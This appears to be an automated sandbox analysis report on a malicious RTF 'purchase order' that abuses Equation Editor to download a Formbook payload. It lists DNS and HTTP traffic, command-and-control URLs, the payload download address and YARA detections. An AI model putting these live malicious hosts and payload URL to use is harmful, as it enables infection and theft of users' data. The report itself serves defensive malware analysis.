            Source: global trafficDNS traffic detected: DNS query: universalmovies.top
            Source: global trafficDNS traffic detected: DNS query: www.besthomeincome24.com
            Source: global trafficDNS traffic detected: DNS query: www.terelprime.com
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.99b6q.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kinkynerdspro.blog
            Source: global trafficDNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS traffic detected: DNS query: www.primeplay88.org
            Source: global trafficDNS traffic detected: DNS query: www.aceautocorp.com
            Source: global trafficDNS traffic detected: DNS query: www.mrart.co.kr
            Source: global trafficDNS traffic detected: DNS query: www.touchclean.top
            Source: global trafficDNS traffic detected: DNS query: www.ibistradingco.com
            Source: global trafficDNS traffic detected: DNS query: www.jnkinteractive.co.kr
            Source: global trafficDNS traffic detected: DNS query: www.chrisdomond.com
            Source: global trafficDNS traffic detected: DNS query: www.riveramayahousing.com
            Source: global trafficDNS traffic detected: DNS query: www.exclaimer342200213.net
            Source: unknownHTTP traffic detected: POST /ufuh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Length: 2159Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedHost: www.kinkynerdspro.blogOrigin: http://www.kinkynerdspro.blogReferer: http://www.kinkynerdspro.blog/ufuh/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 06:26:56 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Thu, 02 May 2024 06:27:38 GMT | Content-Type: text/html | Content-Length: 580 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | content-length: 93 | cache-control: no-cache | content-type: text/html | connection: close | Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 02 May 2024 06:28:11 GMT | Server: Apache | X-Powered-By: PHP/8.1.28 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: br | Content-Length: 9730 | Content-Type: text/html; charset=UTF-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 02 May 2024 06:28:18 GMT | Server: Apache | X-Powered-By: PHP/8.1.28 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: br | Content-Length: 9730 | Content-Type: text/html; charset=UTF-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 02 May 2024 06:28:21 GMT | Server: Apache | X-Powered-By: PHP/8.1.28 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: br | Content-Length: 9730 | Content-Type: text/html; charset=UTF-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Thu, 02 May 2024 06:28:33 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Vary: Accept-Encoding,Cookie | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/" | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Thu, 02 May 2024 06:28:35 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Vary: Accept-Encoding,Cookie | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/" | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Thu, 02 May 2024 06:28:39 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Vary: Accept-Encoding,Cookie | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/" | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 02 May 2024 06:29:02 GMT | Server: Apache | Content-Length: 32106 | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Thu, 02 May 2024 06:29:28 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/" | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Thu, 02 May 2024 06:29:31 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/" | Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 02 May 2024 06:29:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzip
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000003550000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000036D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://aceautocorp.com/ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000003B98000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000003D18000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://jnkinteractive.co.kr/ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh
            Source: dfrgui.exe, 00000008.00000002.847604345.00000000036E2000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000003862000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mrart.co.kr/ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847699564.0000000004E39000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.riveramayahousing.com
            Source: eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.000000000403C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.riveramayahousing.com/?fp=ueCFDhaecdvYVx8hbKh0614IfmGTEHuPdqyahOjyxp6XOetDiexINCTsAPUMAD2
            Source: eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847699564.0000000004E39000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.riveramayahousing.com/ufuh/
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000002D76000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000002EF6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.479701614.0000000001BA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000002D76000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000002EF6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.479701614.0000000001BA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
            Source: dfrgui.exe, 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000003874000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000039F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.349581619.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/opp.scr
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/opp.scrhhC:
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/opp.scrj
            Source: 13d6pS3.8.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000003A06000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000003B86000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ibistradingco.com/ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIW
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2

            E-Banking Fraud

            Source: Yara matchFile source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: MOQ010524Purchase order.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.op55336.scr.3506390.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op55336.scr.3506390.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op55336.scr.d40000.1.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op55336.scr.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op55336.scr.24a19c4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op55336.scr.249f184.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.351612822.0000000000D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Screenshot number: 4Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\op55336.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
